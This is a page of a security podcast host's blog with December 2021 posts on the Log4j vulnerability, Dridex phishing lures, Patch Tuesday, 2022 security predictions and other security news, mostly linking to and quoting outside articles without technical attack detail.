go to sections menu

The Technology blog and podcast

This is for the technology blog and podcast Commentary, articles, and podcasts

header picture for Ingegno theme

You are here: Home [0]

Go to contents or to navigation menu



Sans News Bites, December 28, 2021

Hello everyone, welcome to blogging here on the blog. We’re going to start the blog posts with Sans News Bites. In the December 28th edition, we find some news in regards to Log4J, other breaches in the health care industry and more.

Here is the Web page version of the newsletter that was sent on the 28th.

I hope that this finds you well.

Comments (0)

More Log4J news read during the holiday

During the Holiday break, I have been doing some reading and found some articles I want to talk about. Two of the three in this post were sent to the Security Box Email list, the third was more for people who need to know what to look for to try and protect servers and things from this ordeal and to offer steps on what you can take.

Examining Log4j Vulnerabilities in Connected Cars and Charging Stations

This is probably not a surprise. We read as part of podcast 74 that delbt with Log4J that cars may have an impact, but we really don’t know to what extent.

What we do know is that we now see that at least for now, a proof of concept may be possible.

Here is the opening paragraph. It says:

Evidence of attacks using the Log4j vulnerability was also shown in a test that triggered a bug on a Tesla car. For this case, the source does not provide much information on where it was actually executed. Nevertheless, this means that the exploitation of the vulnerability could still have an impact on the user’s privacy and the general security of the car because a back-end compromise could allow attackers to push actions to the car and serve malicious firmware over-the-air (FOTA) updates.

As we know, the invent of the smartphone can give us a lot of convenience, like checking our email on the go, looking up sports, watching sports or movies, and even playing games. According to this article, it can also replace the keys that you would put in your pocket for the electric cars. This would in turn, make the car a perfect target as you don’t have to have your key around while you operate it.

Here are other paragraphs that might be of interest in this discussion.

Beyond the three devices or properties in modern cars discussed in this article, there are still many more to test and monitor for Log4j vulnerabilities. Among them are servers’ responses to tests and plenty of other vectors that could allow attackers to use the access afforded by applications to send commands that can unlock a car, control the heating, and perform other functions that can be abused by malicious actors.

Nobody has thought about that paragraph before, have they? Yes, you don’t need a lot of gas usage now, and it saves you money, but what about the ways it could be abused like what was discussed in a Security Now episode where someone took a car for a rental and how he still had access? There’s more we’re quoting as part of this too.

Up to now, organizations and security experts are still grappling with the full extent of the Log4j vulnerabilities. It is likely that more reports looking into the effects of these vulnerabilities in specific services, devices, or applications will be released in the coming weeks. On the other hand, cybercriminals are also making the most of this time to catch potential victims, including those who are still exposed via unpatched Log4j vulnerabilities, off guard.

The main fix for the vulnerabilities is to update Log4j to version 2.17.0. This version removes the message lookup feature, which provides a way to add values to Log4j’s configuration, entirely. However, in most cases, such as RISE-V2G, using an up-to-date version of Log4j could break applications.

This is unfortunate, and that’s why we continue to see hospitals being burned, because they can’t update operating systemns and software because it’ll break stuff. Don’t know how to get around that one, I’m afraid.

There’s more including some commands that could be envoked for when things need to get done.

The Log4j story, and how it has impacted our customers

This article was very insiteful even though I’m not a Trend customer. They describe what happened happened. There’s definitely more because they’re doing research in to what is really going on and this is only one of two articles that could tell the story.

What to Do About Log4j

This article I didn’t send to the TSB list because its more for people who need to be aware of what to do to mitigate the vulnerability. Its meant for those who have log4j running within their environment and I want people to have this because its being blogged. You should definitely take a look at this if you’re affected by this vulnerability.

I don’t remember which article, but some articles may talk about multiple CVE 2021 numbers as part of the problem. Be safe, get the latest if you can, and keep reading so you can make your environments as safe as possible.

Comments (0)

U.S. Cert releases mitigating Log4J advice

Hello everyone.

Mitigating Log4Shell and Other Log4j-Related Vulnerabilities was sent on December 22nd and it talks and links to information on what comnpanies can do to do their part on making sure they’re protected.

Perusing articles as I am known to do as of late tells me that Cyberscoop wrote an article titled: CISA, Five Eyes issue guidance meant to slow Log4Shell attacks which should be read too.

They both have information that you should probably read, and even as this is written on the 24th and posted after Christmas, we’re still in the Log4J (Log4Shell) and a couple of more days posting to the blog isn’t necessarily going to hurt anyone.

If you need to have this information, please heed its warnings, as this is only the beginning.

The JRN hopes that you have had a merry Christmas, and we hope the new year will bring us some good news too.

Comments (0)

There’s a Fake Christmas Eve termination troublemaker out there, better read this one

Hello folks,

My goal wasn’t necessarily to blog till after the Christmas holiday, except, I saw that a post of mine got some traction on Linked in where this Cyberscoop article was posted. The article is titled Fake Christmas Eve termination notices used as phishing lures and it is something that needs immediate posting.

A phishing campaign using a well-known malware families is employing a pair of particularly devious methods to trick targets into opening an infected file: fake employee termination notices and phony omicron-variant exposure warnings.

The particular campaign is our good friend Dridex, which has been around since 2014.

The suspicious email told the target that their employment would cease as of Dec. 24, and that the decision was not reversible. An attached password-protected Excel file promised additional details.

As per usual, the file asks you to click continue to run a macro which will infect your machine. According to the article, it says:

Dridex is a trojan dating back to 2014 that typically spreads through email phishing campaigns and is associated with credential theft. It’s been used to steal more than $100 million from financial institutions and banks spread across 40 countries, according to the U.S. Treasury Department.

It further hones my point that it has been around for many years.
Bleeping computer reported this on the 22nd, and if it isn’t sending the phony termination letters to potential people, it is full of ratial things that the researchers have found. That paragraph of the article says:

A reply to TheAnalyst’s tweet containing the phony termination notice noted that in some versions of the email, the “Merry X-Mas” pop-up substituted racial slurs instead of the word “Employees.”

There are two more paragraphs which I’m going to quote. one talks about the ratial things that I mentioned above.

The racist messaging with this particular Dridex effort dates back a couple months, TheAnalyst told CyberScoop Thursday. A phishing email sent to targets around Black Friday, for instance, referenced killing “black protesters,” with a license. “If you find this message inappropriate or offensive, do not hesitate to click complaint button in the attached document and we will never contact you again,” the message read.

The hackers also infuse racist email addresses into the malware payloads, TheAnalyst said, as an effort to troll researchers. Targets of the campaigns don’t see this part of the campaign, but researchers who seek out, examine and expose phishing campaigns do.

Besides that, some people may get a message about someone in the company getting infected with the latest Covid-19 varient, and what they need to do to learn more is to open the attached file.

It is of course, a passworded file.

Please make sure you know where you are getting for files. For example, the JRN will always tell you what files are being sent, and will indicate the format if possible. If you don’t see any information about what you’re getting and you see its from any of my team that may represent me, you can contact me by phone, or through a trusted address you have on file or through my contact form.

Please be safe! We don’t want you to get infected and have more problems than you already have. Thanks so much for listening, reading and participating!

Comments (0)

The Security box, podcast 75: 2022 predictions, what do you think?

This is the last podcast of the year, unless something breaks we need to cover in audio.

This week, you’ll get a discussion and even some holiday music for the Christmas Holiday this weekend.

Please find the show notes for the program below the ruler, and I’ll be back with articles of interest after the Christmas holiday. Thanks so much for reading and participating as we navigate the Security landscape together.


Welcome to the Security Box, podcast 75. On this edition of the podcast, come with me as we do a little predicting for 2022 with a Trend Micro article titled Pushing Forward: Key Takeaways From Trend Micro’s Security Predictions for 2022. We’ll also have thoughts on recent news read, and its been decided that the full news notes segment will be no more in favor of topics that need discussion. This doesn’t mean that we won’t cover news, but we’ll cover it a little differently.

Topic

Comments (0)

Windows Update foreshadowed by Log4J

Hello everyone,

While I had things to attend to today, I did a little bit of reading and found Krebs On Security’s article dealing with Windows Update.

Unfortunately, we won’t be doing Windows Update because we need to do other topics, but it is important to blog what we can so that people are aware of it.

The article from Brian is titled Microsoft Patch Tuesday, December 2021 Edition for those who want to read it.

The opening paragraph of this mid-Decmeber article says:

Microsoft, Adobe, and Google all issued security updates to their products today. The Microsoft patches include six previously disclosed security flaws, and one that that is already being actively exploited. But this month’s Patch Tuesday is overshadowed by the “Log4Shell” 0-day exploit in a popular Java library that web server administrators are now racing to find and patch amid widespread exploitation of the flaw.

While this is still true, and Security Now today is titled “Log4J Christmas” we should be dilligent on making sure our software is up-to-date.

The Security Now program is being taped as we speak, and should be available as a podcast by morning.

In case you missed it, here are several paragraphs as we know it and as Krebs wrote for this article.

Log4Shell is the name picked for a critical flaw disclosed Dec. 9 in the popular logging library for Java called “log4j,” which is included in a huge number of Java applications. Publicly released exploit code allows an attacker to force a server running a vulnerable log4j library to execute commands, such as downloading malicious software or opening a backdoor connection to the server.

According to researchers at Lunasec, many, many services are vulnerable to this exploit.

One of the things mentioned in this article is the mention of “Apache Struts” which was used in earlier attacks.

In regards to Windows Update, as part of this article, a half dozen of the patches are rated critical by Microsoft. The biggest flaw seeing exploitation is CVE-2021-43890

link

Malware families like Emotet, Trickbot and BazaLoader may take advantage of this flaw.

There’s much more to the article that I linked above, and I link to the CVE and other info for you to look at if it interests you.

Thanks so much for reading, make it a great day!

Comments (0)

Pushing Forward: What do you think the predictions of 2022 will be?

Hello folks,

As I prepare the program for this week, i’m going to talk about predictions this week. The article is titled Pushing Forward: Key Takeaways From Trend Micro’s Security Predictions for 2022 which I’ve taken highlights of in a list type of format instead of quoting the article.

Since this is a blog post, we can go ahead and do a little more of a deap dive on this, and that’s what I’m going to do on this article.

threat actors or cybercriminals will evolve their tactics, although the TTP’S are going to be the same. According to the article, they will evolve and even go after the data our cars have. This should be a concern for those who have cars, because everything you connect to, then could be exfiltrated if it is meant to do so.

The headings in this article include:

  • As they focus on making their supply chains more robust via diversification and regionalization, enterprises will implement zero trust principles to keep their environments more secure Global supply chains will be in the crosshairs of fourfold extortion techniques as companies evolve their supply chain operations
  • Enterprises will ensure that cloud security basics are employed to defend their environments against a slew of cloud security threats and achieve a managed level of risk
  • To remain protected against evolving ransomware threats, enterprises will set their sights on protecting their servers with stringent server-hardening and application control policies

Each portion has some very interesting things to say about each section. What worries me if this does come true is the server attacks. In theory, they may not necessarily have to lock up the files on the server, but exfiltrate the data completely out. While it could be possible for them to lock up the server, this could put us at risk. I’m predicting that if they go this way, we as consumers will have bigger problems, as we would be accessing a server that would be infected and that could in theory be passed to us. This could be a huge problem as some of us are still computer based, while some may be Android or IOS specifically based, and even some may be both PC and Android or IOS based.

While IOS 15.2 has been released to those of us with IOS, Android must be better on making sure that their updates are given to us who use it in a timely manner.

In 2022, Google, the manufacture of Android, must push their updates like IOS does. They must in muy opinion make sure their customers get the latest for the phone they have. IF Apple can do it, Google should too. Trend Micro didn’t cover this, but I should just add it anyway.

There is much more in this article which I highlight and we’ll talk about, feel free to read more and learn, and at least think about what Trend is saying. They have been in this business for 30 years, and they have insight that us consumers don’t. What they write in this article makes complete sense, only time will tell.

Comments (1)

Another U.S. Government backdoor hack? Where is the person who can fix this?

So, my question about a recent article sent within the past week to the Security Box list talking about the U.S. Government problems is: Where are the people who are responsible for this issue to resolve it?

By publishing details on whatever the vulnerability the government has now, actors can find that post and take advantage of whatever it is like they’re doing with Log4J and other vulnerabilities they wish to persue.

This article is an arstechnica article titled Backdoor gives hackers complete control over federal agency network and should be perused so you can tell other people you might know about it and make sure you and them aren’t infected with whatever this is. I read the article, and the government must be ashamed of itself, and if not, they will be soon.

Read the full article to see what’s going on.

Comments (0)

Log4J: its being used in targeted attacks

Hello folks,

Trying to do some backreading, I guess I can’t be surprised at the fact that this vulnerability will be used for harm.

In this article titled Nation-state hackers aim to exploit Log4j software flaw, Microsoft warns it should not be surprising that countries are wanting to leverage this for their use.

While this article stipulates that the United States has not been targeted yet, it is a bit backdated and it would not surprise me if things have changed by now. We know that this is a developing story, and as developing stories go, we’ll want to keep watch on it.

This is probably going to be the first of many articles coming, so make sure that you keep your eyes open on what you find, even if we don’t blog it. It may apply to you.

Log4J is something that affects software as well as servers, and as I said as part of Throwback Saturdaynight

For a limited time, Please download this week’s show where we talk about this. Remember that you can also go to our RSS and pick up podcast 74 which we covered this as extensively as we could at the time.

Thanks so much for reading, and make it a great day!

Comments (0)

Apple Releases IOS 15.2

The JRN has heard that Apple released IOS 15.2 to address log4j. If that’s the case, wonderful! Besides that, IOS 15.2 does fix some long standing issues with SIRI and possibly other things you might find of interest thanks to AppleVis.

The article is titled Apple Releases iOS 15.2 and iPadOS 15.2; Bringing Apple Music Voice Plan, App Privacy Report, New Safety Features, and Bug Fixes so if there is anything that is of interest in this list that makes you go and update, that’s great!

There is a report saying that Bluetooth may have issues with this version, especially with braille displays. Haven’t gotten the orbit 40 to work when I got the replacement unit with IOS 15.1 even though the connection is there and it successfully sees it. It doesn’t connect, saying that it isn’t supported. It can’t be duplicated by Orbit.

Take care.

Comments (0)

More on Log4J December 17, 2021: morning reading articles

I’m continuing to read from articles that have been sent to my list about Log4J and I’ll briefly talk about what I’m reading.

Logging system security flaw compromises iCloud, Steam accounts Ars Technica

This article talks about the initial report on this explosive Vulnerability. Besides podcast 74 which we released yesterday, we’ll be on Throwback Saturday Night for the last hour of their show on the Mix. There is really nothing new within this article, but if you really want the beginning, this may be something worth reading.

Hackers launch over 840,000 attacks through Log4J flaw Ars Technica

This was talked about as part of the original articles I took from for podcast 74 of the Security Box. Unfortunately, actors will jump on anything to get their hands in to our data and Clubhouse continues to have rooms about this. I wanted to listen to the weekly news room happening at the time I’m writing, but I can’t listen to it and blog these articles, so hopefully, there’ll be a replay of this available that I can catch later.

One of the paragraphs in this article probably doesn’t surprise me any. It says:

Perpetrators include “Chinese government attackers,” according to Charles Carmakal, chief technology officer of cyber company Mandiant.

Since the Chinese have really been up to no good in my opinion, especially during this pandemic, nothing surprises me in regards to this paragraph.

I want to stress this paragraph which states:

The flaw in Log4J allows attackers to easily gain remote control over computers running apps in Java, a popular programming language.

People may be confused between Java and JavaScript, but these are two different languages. Javascript is a scripting language used in web pages, where Java can be used in programming altogether.

While I understand Apple has put out a patch, this next paragraph might be of interest. It states

Both CISA and the UK’s National Cyber Security Centre have now issued alerts urging organizations to make upgrades related to the Log4J vulnerability,
as experts attempt to assess the fallout. Amazon, Apple, IBM, Microsoft, and Cisco are among those that have rushed to put out fixes, but no severe breaches
have been reported publicly so far.

As I’ve heard in rooms, this Apache logging system is in quite a lot of products and services and this could be here for quite awhile.

Within the podcast, we mentioned our good friend Mirai, and one of the paragraphs within this article talks about other things out there that are using this flaw. That paragraph says:

According to Check Point, nearly half of all attacks have been conducted by known cyber attackers. These included groups using Tsunami and Mirai—malware that turns devices into botnets, or networks used to launch remotely controlled hacks such as denial of service attacks. It also included groups using XMRig, a software that mines the hard-to-trace digital currency Monero.

So … we’ve got actors using quite a number of old friends in new ways that will haunt this industry.

Also, the article indicates that you can get unlimited access with this vulnerability. Apache has released now two patches to deal with this, and according to what I’ve heard in rooms, its been out there since 2013.

The paragraph mentioning this statement I just mentioned says:

The flaw has existed unnoticed since 2013, experts say. Matthew Prince, chief executive of cyber group Cloudflare, said it started to be actively exploited from December 1, although there was no “evidence of mass exploitation until after public disclosure” from Apache the following week.

This is definitely going to get very interesting.

As Log4Shell wreaks havoc, payroll service reports ransomware attack Ars Technica

This is unfortunate. While Ransomware is on the rise, Log4j is taking hold as an attack vector. The company here is not ruling out the attack point being log4j and they’re very clear that this is going to take weeks to resolve. You should at least check this article out because there may be some similarities, although nothing is confirmed whether the entry point for the ransomware was Log4J or not. Can’t forget this attack point.

Patch fixing critical Log4J 0-day has its own vulnerability that’s under exploit Ars Technica

As stated, Apache has released two fixes, and this was covered in clubhouse in various rooms. In the room I left when I wanted to write this post they were mentioning that they’ll be continuing to watch this, as there are people in this industry who are in that room. They also said that the open source software packages and programs are “not secure” anymore after this, and I can see why they are saying that. I’m not about to make that claim, as software like the twitter clients for the blind for the PC are written in the open source system and they’re very safe to use. So, let’s make sure that we mention that there may be software that qualifies as not safe, but not all open source software is going to be unsafe.

The article talks about the earlier 2.15 release and what was fixed in 2.16, so please read this if you need to know what is going on.

More Later

I’ll continue to write more as I continue to read more. This is all I’ve read as I continue to catch up. Let’s make sure we stay as safe as possible

I’ll also be blogging some of the news too, as we need to be aware of this big time flaw so th news will be blogged as well. Thanks for reading!

Comments (0)

Run Firefox? Look for an update to firefox 95

Firefox 95 is out, and according to a recent article I saw on the subject sent to the TSB list, it is quite interesting what they’re doing.

The Ars Technica article is titled Firefox 95 for Windows and Mac introduces RLBox, a new sandboxing tech which talks about it.

They look to improve this technology so that they don’t have to scramble around when a major problem occurs, according to a quote. There’s a link to a write up so go and check this article out.

Comments (0)

The Security box, podcast 74: Log4J

The Securithy box was released today, and Clubhouse has the replay in raw form.

You can search me out, and you’ll find the security box room there.

If you want the podcast, please go over to the RSS feed to pick it up.

If you need a direct download, please contact me and I’ll get you a link.


Welcome to the Security Box, podcast 74. On this podcast, something breaking this week called Log4j. We’ll break down three different articles that talk about this. Instead of me doing news notes, we’ll ask listeners if they have any thoughts on what they have read. There may be questions, comments and other topics not mentioned here for you to enjoy too.

Topic

  • Log4J

This is still developing, and we’ll continue to blog about this and other things throughout the holidays.

Thanks so much for checking out the podcast, and make it a great day!

Comments (0)

The first article on Log4J

The first article which I saw but only read recently is the first of many. We’ll continue to keep you abreast of what the articles are talking about when we read them, and as I said, this is the first.

The first article is titled The Internet’s biggest players are all affected by critical Log4Shell 0-day and was interesting even though read late.

While Mindcraft had some significant issues, other services mentioned and figured in the article have some sort of issue when fed whatever is causing this vulnerability in the first place.

We’ve learned that hundreds if not millions of services and people may be affected by this.

More later.

Comments (0)

The problem of the month: Log4J

Hello everyone,

As we release the podcast for the Security Box, we had to change the topic to this new vulnerability with Apache and Java called Log4j/.

The podcast covers three articles which are good, but I did find one that was sent to the Security Box’s list last Friday.

We still have a lot to learn, including the fact that information continues to come out about it.

This reminds me of Solar Winds of Last Year, when the Security Box covered it non stop, and I wrote up articles to try and get information out there.

What we do know is quite interesting. We know that some of our past friends we’ve talked about in the exploit side of things are part of this too, including Emotet and ColbaltStrike.

I’m also sure that the Security Box will also have commentary and continued thoughts as we learn more.

There are others I’ve not read as of yet. 4 of them were just sent to our list yesterday evenoing.

Want to subscribe to the Security Box where we’ll post articles like these that might be of interest? Click on this link to subscribe to The Security Box list You’ll be taken to a page on the mix’s web site.

I hope that this is of value to you, and that we solve this quickly. I’ll have more thoughts as I read.

Comments (0)

The Security box, podcast 73: AT&T and an appliance having potential malware, news notes and much more

Hello everyone, welcome to podcast 73 of the Security Box. On this edition of the podcast, we’ll be having a grand old time. We’ve got a very interesting AT&T issue that business customers may need to hear if nothing else. We’ll have news, notes and more.

The RSS feed has a copy of the program, so feel free to get it. If you can’t get RSS for any reason, let me know and I’ll be happy to send it to you.

Here are the show notes for this program.


Hello folks, welcome to the security box, podcast 73. On this podcast, plenty of news notes and a very interesting topic dealing with AT&T and appliances that are made to bridge the gap between the ISP and the managing of phone calls, conference video systems and similar real-time applications. We hope that you’ll enjoy the program and thanks for listening!

Topic

Business customers need to be aware if they use AT&T products of potential malware.

News Notes

Here are the links to News Notes. Some may be blogged already through the blog, so see if there is something that interests you.

Please enjoy the program and thanks so much for listening.

Comments (0)

A UK bill that has a great bill in practice, but how hard is it to enforce?

I just read and put in our show notes an article that asks a question. Its titled Is the UK government’s new IoT cybersecurity bill fit for purpose?

In practice, I think we all agree by using unique passwords, we’ll start dealing with the problem of the default password. But with that said, there are questions in regards to maintenance and how support personnel can get in to do their job.

There is also something that I don’t think the article covers. This is dealing with updates. We know that getting updates to IOT devices can be easy if they’re programmed to go and check for updates, especially right after a connection to the Internet is established. But what about after?

Lets discuss this one.

Comments (1)

The last of an international Sim-Swapping gang arrested

The final member of an international gang called the Community has been arrested and charged with sim-swapping activity. This is an on-going problem, I know, but maybe this is a start.

The article is titled US hacker jailed for role in multimillion-dollar SIM swapping campaign and comes from Tech Crunch.

There are others mentioned in this article that were also charged. Some may have had lighter sentences than others, and the article talks about all of it.

Comments (0)

Maybe a bonehead award of the day, read the articles and you decide

In my recent readings, there are two articles that cover the same thing. They may both cover it a little bit differently, but they both also say the same thing.

While not a complete bonehead, we know that issues can occur which include power outages, natural disaster and other things not thought of.

What we are talking about here is someone who worked for Ubiquiti. Both articles are:

Both articles indicate that Nicholas Sharp is the person that was arrested, and at least one of the articles indicate that he downloaded tons of data.

The Krebs article indicates that he is (or was) the senior developer at the company.

Here are three paragraphs of the Krebs article.

On Dec. 28, other Ubiquiti employees spotted the unusual downloads, which had leveraged internal company credentials and a Surfshark VPN connection to hide the downloader’s true Internet address. Assuming an external attacker had breached its security, Ubiquiti quickly launched an investigation.

But Sharp was a member of the team doing the forensic investigation, the indictment alleges.

“At the time the defendant was part of a team working to assess the scope and damage caused by the incident and remediate its effects, all while concealing his role in committing the incident,” wrote prosecutors with the Southern District of New York.

I’m sure there is more that either article may not have covered, and as I’ve said, both are good reads.

Make it a great day!

Comments (0)

More NSO denials, you decide

Continuing to read up on articles, I am not going to cover this, but this ars technica article titled iPhones of US diplomats hacked using “0-click” exploits from embattled NSO should be looked at.

It seems like they are continuing to deny that U.S. people are being targeted, even if they have numbers elsewhere because of where they live.

They are now claiming in this article that they will cooperate with governments now? They haven’t before. They’ve denied and continue to do so here that their software isn’t used in U.S. situations and then they say once installed, they don’t know where the software is being used.

This sounds contradictory to me. Thoughts are welcome.

Comments (0)

« Newer PostsOlder Posts »

go to sections menu


navigation menu

go to sections menu